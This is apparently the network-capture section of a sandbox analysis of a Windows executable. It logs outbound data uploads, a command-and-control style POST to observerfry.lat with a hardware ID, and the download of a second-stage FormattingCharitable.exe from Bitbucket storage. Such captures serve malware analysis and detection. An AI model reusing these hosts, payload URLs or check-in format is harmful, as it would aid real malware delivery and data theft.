                                                                                                                                              2024-12-24 07:50:53 UTC15331OUTData Raw: 66 56 22 f9 e8 a6 b2 cd ff fa 65 ad c4 c5 12 6d 78 0c 32 09 0c 59 69 4a c0 71 47 84 7e 0d 31 79 e1 45 cc 56 ee 8a 79 1c 35 ae 66 6d 35 4e 67 7e 83 2e 80 3d 7c 32 49 a2 0a 9f 1f d7 44 f4 65 0b 70 4d 9f 3a 83 21 10 a4 a1 b4 3a 8a 5c b6 d0 ea ed af ca 32 b0 21 77 e6 12 26 4d cf 18 43 ce 82 ba cb 98 8a e0 32 59 fc d5 82 b1 31 de 31 55 0b 25 b2 3c a5 e7 0e ae 42 00 31 0b b1 04 c0 f5 18 3e fa 59 1e e4 45 d1 b0 0c 8b e0 b8 33 04 54 98 22 af d7 b1 ea 93 f3 a6 f0 ff 98 d4 4c 88 3a 34 73 f8 a7 cc a8 c2 64 c1 22 7f 3e ee 4f 88 d1 fd a2 9e 2e 23 ea ff 9a 57 bd 77 dd 2e 27 e0 2e 3a e2 37 6e db e4 7f 8d 3a f1 a4 10 15 11 af fc 70 5d 6f 9a 26 05 91 0f c1 d5 8e c0 48 41 90 b2 3b 06 d9 f1 ff f8 42 d7 79 09 cd df 3d 2d ba e4 06 1f 5e a3 52 c3 9e 89 d7 44 be ae e7 02 4a ab
                                                                                                                                              Data Ascii: fV"emx2YiJqG~1yEVy5fm5Ng~.=|2IDepM:!:\2!w&MC2Y11U%<B1>YE3T"L:4sd">O.#Ww.'.:7n:p]o&HA;By=-^RDJ
                                                                                                                                              2024-12-24 07:50:53 UTC15331OUTData Raw: e3 f9 27 2f 3d be 3f 7a e9 51 e7 30 67 4f fa fa cf dd 63 fd b4 27 15 bf 6c 2e 33 cf 88 07 11 d7 9d 05 a2 ff 6a f7 48 8f b2 a0 f8 67 55 f9 1b 7d ba 7b ff d6 48 0f e5 da 65 60 08 6a 0a 5e fc e7 6d f6 d5 51 83 cf 58 5c 64 5e 12 a4 30 15 2c b7 76 34 bf 3b 8c 13 97 30 df bb a2 4e d9 d5 6f ac a4 12 c7 8f b0 76 f8 d2 16 18 f8 9d bc 05 3f 75 26 7c a7 1e 4c 3d 94 42 63 8d ba a8 af f4 4c bc 4a 07 4d 1f 3b ee ef 9e 1b 99 98 cc ab 59 a1 cc a6 b2 6b d3 23 59 25 a3 01 4c c5 74 cf 21 b6 74 dc 6e 38 22 bf b4 ef 91 3f 63 d0 61 de 9e 0a 5f 96 72 ef 4c f6 d4 ad 5c 90 b5 75 da 8b ff 42 a9 b6 f2 b1 a6 0d cd 0c 7f 80 c5 6d 73 6e 6d 5d 2e 7f a0 2b 59 36 37 ba b9 db 74 a8 f2 85 9d 9e 68 95 e8 ec b7 8d d1 aa 85 64 66 57 55 9b 17 ab 91 cd 73 74 3c 68 77 32 55 64 3b 23 e3 d1 82 6f
                                                                                                                                              Data Ascii: '/=?zQ0gOc'l.3jHgU}{He`j^mQX\d^0,v4;0Nov?u&|L=BcLJM;Yk#Y%Lt!tn8"?ca_rL\uBmsnm].+Y67thdfWUst<hw2Ud;#o
                                                                                                                                              2024-12-24 07:50:53 UTC15331OUTData Raw: e2 bd 9f a6 8b dc b2 36 cd b0 cf 42 f1 c5 c2 e6 23 55 91 41 97 be 55 7f bb ea c7 7a ff a7 4b 1b 25 2c 34 c9 32 38 14 b9 96 a3 8d 96 d4 00 b2 f8 4b e4 98 cd 0b 32 e4 11 86 c4 d2 af 1b b9 f3 99 e1 a5 37 2e 9f 24 af 44 89 87 7b e5 a6 9b 84 89 43 63 2c 83 38 5c 34 25 ff 10 5c 34 61 ac 50 15 19 9c 0a b9 76 3d cb 1f 0c 1d f8 01 a9 29 b4 d7 dd 2b 60 d3 cf a8 c7 04 12 6b 68 cd 50 36 c3 5c 1a 8e 40 f1 0a 13 6b 67 1a 1e 87 72 4f 7e f2 ee 43 a5 46 c0 ee ec 0e 6b b5 cc 6a 45 76 be 85 c5 4a a4 0d cc 05 be af 35 1c 40 44 38 da 06 3c df 4b f3 d8 3c 4b e2 fa 2e 9d 7c d4 e0 b8 06 3d 4b 1c 8e 0c d2 fe a1 26 ba b6 63 7f 7b e5 a4 58 bb d1 bd cb 59 4c 7b fe 8f 8e 98 d0 54 1c a5 d0 76 24 24 17 f3 62 a0 c2 c0 83 e7 e9 85 cb dc 93 81 ee 35 38 fb 88 83 ec 94 14 4e f4 d2 53 88 76
                                                                                                                                              Data Ascii: 6B#UAUzK%,428K27.$D{Cc,8\4%\4aPv=)+`khP6\@kgrO~CFkjEvJ5@D8<K<K.|=K&c{XYL{Tv$$b58NSv
                                                                                                                                              2024-12-24 07:50:53 UTC15331OUTData Raw: b9 a8 49 f6 13 89 f9 15 9c f9 7c fa 9f b3 a1 c1 15 d5 a1 fd 1a 43 d6 39 7a 3f 78 b0 9b be 1d e8 b2 2f ef cd 5f 89 bd 0f 37 74 a8 93 a3 60 5c 9c 8e 1c c1 cf ee 5d 3f 96 88 8b e9 12 fa fd 89 6d 3d e1 e4 c2 7e 19 e8 78 15 ae d9 b9 cb 09 0e 87 a3 65 c4 04 36 82 1b 58 aa 52 59 41 7f fe a5 3b 60 69 0b 0d a9 5c 09 61 e8 f9 db 74 84 ff de 7d b3 e6 a2 44 9f 87 98 43 f6 0e 25 b9 0a c5 7b 6a cf 07 34 b4 b1 bd c1 50 fc cd fe 13 d2 cb d4 6d 19 fc f1 ba d5 0e 06 c3 6d 74 82 69 ce 59 01 7b 99 c8 a9 30 85 bb 62 ea 90 ac 7d 70 e7 90 95 d6 3c 9b 7e 88 1b 7f 99 fd 9e 5f 8c e7 13 39 c0 e0 27 f7 84 28 52 8b e6 6d f0 62 b3 d2 cb 66 70 08 ec ff b0 45 ed ca d5 b5 6f 87 e1 bd 0a c4 2e 6d d9 44 55 c3 1c 74 e7 eb be 04 2f 07 13 98 9b eb 7d 1e 0a e0 b2 bb 7c 08 a7 98 d1 b5 5e 13 34
                                                                                                                                              Data Ascii: I|C9z?x/_7t`\]?m=~xe6XRYA;`i\at}DC%{j4PmmtiY{0b}p<~_9'(RmbfpEo.mDUt/}|^4
                                                                                                                                              2024-12-24 07:50:56 UTC1131INHTTP/1.1 200 OK
                                                                                                                                              Date: Tue, 24 Dec 2024 07:50:56 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=2m5f7ih9p54gd2ffafj3pt8pam; expires=Sat, 19 Apr 2025 01:37:34 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EHBgNSxYWwjdM1Z9jtTVzKCDiM1qifIaoiaBOQ0UOUnszjmd42wVoeN7nhBnZblRVbWlbiQsiCG17K%2Fp%2FAwSr4ohpMqpSy5p5Ybg2X8IdXLbtUByewCN%2BnmD7WEOa38QvMY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f6f00c6df9541f2-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1754&min_rtt=1754&rtt_var=659&sent=360&recv=608&lost=0&retrans=0&sent_bytes=2835&recv_bytes=588358&delivery_rate=1658148&cwnd=231&unsent_bytes=0&cid=f193914935fbc469&ts=3672&x=0"


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              7192.168.2.749746172.67.199.72443424C:\Users\user\Desktop\tTGxYWtjG5.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-24 07:50:58 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 88
                                                                                                                                              Host: observerfry.lat
                                                                                                                                              2024-12-24 07:50:58 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 43 34 38 33 33 45 32 39 32 38 35 37 43 34 38 44 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=C4833E292857C48DBEBA0C6A975F1733
                                                                                                                                              2024-12-24 07:50:58 UTC1130INHTTP/1.1 200 OK
                                                                                                                                              Date: Tue, 24 Dec 2024 07:50:58 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=30sdha60prk82os9jlkkl7tafv; expires=Sat, 19 Apr 2025 01:37:37 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RqsdHpbO%2B3nHvMdoe%2FgWZjxFC%2FDyoTFBtLE7EsMeJmr%2FwFfauuMvoHHCMRgjDMGu5WIGGuaIIVcoiwFs3JUyCNf%2B7v%2BZ1VIBs0gpSsOBAAVXFIc8OEP7PPTId7oyY24%2F4d4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f6f00e60dec41d3-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1679&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1658148&cwnd=32&unsent_bytes=0&cid=171af885d53c00ae&ts=791&x=0"
                                                                                                                                              2024-12-24 07:50:58 UTC239INData Raw: 31 31 30 0d 0a 2f 68 79 39 78 47 42 58 69 53 57 39 4d 72 43 6c 50 43 2b 43 65 62 55 68 36 44 46 6e 43 41 55 6a 45 4c 78 36 34 61 55 6b 68 73 43 6c 5a 35 2b 78 51 6d 32 72 54 63 6c 47 77 4e 59 47 63 36 30 6c 6d 6b 4f 42 52 51 56 39 5a 6b 68 31 79 46 53 4f 31 30 50 61 37 35 4e 6c 30 36 45 58 49 4f 5a 58 31 6b 48 41 78 46 39 4b 73 30 75 47 45 74 6b 44 4f 79 64 32 51 48 37 59 4a 73 37 42 53 2f 47 75 6b 6e 50 63 6f 42 4d 4c 70 6d 50 53 51 4e 33 45 53 46 76 72 46 39 4a 69 67 46 41 56 59 58 46 43 63 74 41 66 7a 38 42 63 34 2b 4c 53 50 74 75 77 51 6d 32 35 43 5a 39 58 6b 70 38 4e 55 71 34 43 6c 31 54 4b 43 30 56 67 63 56 64 67 68 69 62 4f 2b 51 75 33 2b 4d 73 79 6a 2f 56 56 65 62 67 55 6a 68 79 42 6b 32 41 41 37 52
                                                                                                                                              Data Ascii: 110/hy9xGBXiSW9MrClPC+CebUh6DFnCAUjELx64aUkhsClZ5+xQm2rTclGwNYGc60lmkOBRQV9Zkh1yFSO10Pa75Nl06EXIOZX1kHAxF9Ks0uGEtkDOyd2QH7YJs7BS/GuknPcoBMLpmPSQN3ESFvrF9JigFAVYXFCctAfz8Bc4+LSPtuwQm25CZ9Xkp8NUq4Cl1TKC0VgcVdghibO+Qu3+Msyj/VVebgUjhyBk2AA7R
                                                                                                                                              2024-12-24 07:50:58 UTC40INData Raw: 2f 54 66 63 64 56 41 6d 34 72 52 6d 6a 5a 57 4d 32 48 51 76 4c 69 78 43 79 52 35 67 56 31 73 78 54 41 62 77 3d 3d 0d 0a
                                                                                                                                              Data Ascii: /TfcdVAm4rRmjZWM2HQvLixCyR5gV1sxTAbw==
                                                                                                                                              2024-12-24 07:50:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              8192.168.2.749752185.166.143.48443424C:\Users\user\Desktop\tTGxYWtjG5.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-24 07:51:00 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Host: bitbucket.org
                                                                                                                                              2024-12-24 07:51:01 UTC5943INHTTP/1.1 302 Found
                                                                                                                                              Date: Tue, 24 Dec 2024 07:51:00 GMT
                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                              Content-Length: 0
                                                                                                                                              Server: AtlassianEdge
                                                                                                                                              Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAATU3DWE&Signature=CB%2FhJqRRscnPJ9O8Lh%2F9UJjvRsI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJIMEYCIQCmp4sJiJ2Vg6lV0IveQh7F4q5yllY1RSaQ%2FRcDZG8jLAIhAPOa65Thr25Wh%2Bug0HyKJXl55OoT1s0rFYCYSSkigJNCKrACCOn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwDuXuwpnkzPvUt7VoqhAIz%2BmwV7tES1WBaFS7IYWek7EXNAzdsYmQgkGyYrYxyA33m%2FJutt9lbP2U%2BMaAYuta1agrCmRKMj5pCeNx%2F%2FwHViPQ9O1Ned5SZGGKGYUIs5Bq6ktSFT%2BMOQ4n4hJi21TpAZk%2BO8TxTIusr5XqnH9VIGNA8dgL7jsf5ft4ir%2FWp2Hc2tIKVTm4EwHvhE8TCDJFhxF9IMnhSEQM1Wo1iIEeHRPK1a6jc18zDcHrHLu3Rf%2FTmzTrnBPx%2FWf4S5A%2F7CtkqMo29ARzMDm3VVSop46xM1Dz7%2FrkryEckuEuDtCT2F7eMPTxyXoW9PbRARoYCpJjbZ4p3lahtqL2qhmtVntLRTt6RNTCPz6m7BjqcAfpKPZ%2Bk48Y1M5IVUnLseVOnLKBZZZTFh9obbou77yeNXL9JcUQ1nOrkQPFNF%2BuaOyO%2FvQp [TRUNCATED]
                                                                                                                                              Expires: Tue, 24 Dec 2024 07:51:00 GMT
                                                                                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                              X-Used-Mesh: False
                                                                                                                                              Vary: Accept-Language, Origin
                                                                                                                                              Content-Language: en
                                                                                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                              X-Dc-Location: Micros-3
                                                                                                                                              X-Served-By: 49cdb257586a
                                                                                                                                              X-Version: c9b3998323c0
                                                                                                                                              X-Static-Version: c9b3998323c0
                                                                                                                                              X-Request-Count: 376
                                                                                                                                              X-Render-Time: 0.04333305358886719
                                                                                                                                              X-B3-Traceid: 6b674bb243634c8c92ad6fd30405d936
                                                                                                                                              X-B3-Spanid: b8aaa3863758855f
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian [TRUNCATED]
                                                                                                                                              X-Usage-Quota-Remaining: 999114.779
                                                                                                                                              X-Usage-Request-Cost: 897.87
                                                                                                                                              X-Usage-User-Time: 0.026936
                                                                                                                                              X-Usage-System-Time: 0.000000
                                                                                                                                              X-Usage-Input-Ops: 0
                                                                                                                                              X-Usage-Output-Ops: 0
                                                                                                                                              Age: 0
                                                                                                                                              X-Cache: MISS
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                              Atl-Traceid: 6b674bb243634c8c92ad6fd30405d936
                                                                                                                                              Atl-Request-Id: 6b674bb2-4363-4c8c-92ad-6fd30405d936
                                                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                              Server-Timing: atl-edge;dur=154,atl-edge-internal;dur=4,atl-edge-upstream;dur=152,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                              Connection: close


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              9192.168.2.74975816.15.177.52443424C:\Users\user\Desktop\tTGxYWtjG5.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-24 07:51:03 UTC1352OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAATU3DWE&Signature=CB%2FhJqRRscnPJ9O8Lh%2F9UJjvRsI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJIMEYCIQCmp4sJiJ2Vg6lV0IveQh7F4q5yllY1RSaQ%2FRcDZG8jLAIhAPOa65Thr25Wh%2Bug0HyKJXl55OoT1s0rFYCYSSkigJNCKrACCOn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwDuXuwpnkzPvUt7VoqhAIz%2BmwV7tES1WBaFS7IYWek7EXNAzdsYmQgkGyYrYxyA33m%2FJutt9lbP2U%2BMaAYuta1agrCmRKMj5pCeNx%2F%2FwHViPQ9O1Ned5SZGGKGYUIs5Bq6ktSFT%2BMOQ4n4hJi21TpAZk%2BO8TxTIusr5XqnH9VIGNA8dgL7jsf5ft4ir%2FWp2Hc2tIKVTm4EwHvhE8TCDJFhxF9IMnhSEQM1Wo1iIEeHRPK1a6jc18zDcHrHLu3Rf%2FTmzTrnBPx%2FWf4S5A%2F7CtkqMo29ARzMDm3VVSop46xM1Dz7%2FrkryEckuEuDtCT2F7eMPTxyXoW9PbRARoYCpJjbZ4p3lahtqL2qhmtVntLRTt6RNTCPz6m7BjqcAfpKPZ%2Bk48Y1M5IVUnLseVOnLKBZZZTFh9obbou77yeNXL9JcUQ1nOrkQPFNF%2BuaOyO%2FvQpad0BaYzg34uvur9Ge%2FjUPRr9wdY2fX83lmXUzA%2FY [TRUNCATED]
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                              2024-12-24 07:51:03 UTC586INHTTP/1.1 200 OK
                                                                                                                                              x-amz-id-2: qJlSH5K3xPnSkSKZ+UBJD+QU0ufuXMLHl0qGf7RjNgpFKUTBBfNzdpwBpQlLZu6J14ryRwnScuIWKKft0ICzyqLJAcTf9Z0DnOP1X+iC5XE=
                                                                                                                                              x-amz-request-id: 0BG80YQZS0WXEXQH
                                                                                                                                              Date: Tue, 24 Dec 2024 07:51:04 GMT
                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                              ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                              x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                              Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                              Content-Length: 1325507
                                                                                                                                              Server: AmazonS3
                                                                                                                                              Connection: close
                                                                                                                                              2024-12-24 07:51:03 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                              2024-12-24 07:51:03 UTC438INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                              Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                              2024-12-24 07:51:03 UTC16384INData Raw: 7d 0c 0b 04 00 00 75 32 a1 68 1d 44 00 3b c3 74 07 50 ff 15 2c 90 40 00 a1 6c 1d 44 00 3b c3 74 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff
                                                                                                                                              Data Ascii: }u2hD;tP,@lD;tP0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'
                                                                                                                                              2024-12-24 07:51:03 UTC1024INData Raw: 00 00 48 00 69 00 64 00 65 00 57 00 69 00 6e 00 64 00 6f 00 77 00 00 00 00 00 50 00 6f 00 70 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73
                                                                                                                                              Data Ascii: HideWindowPop: stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s
                                                                                                                                              2024-12-24 07:51:03 UTC16384INData Raw: 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28
                                                                                                                                              Data Ascii: CreateDirectory: can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (
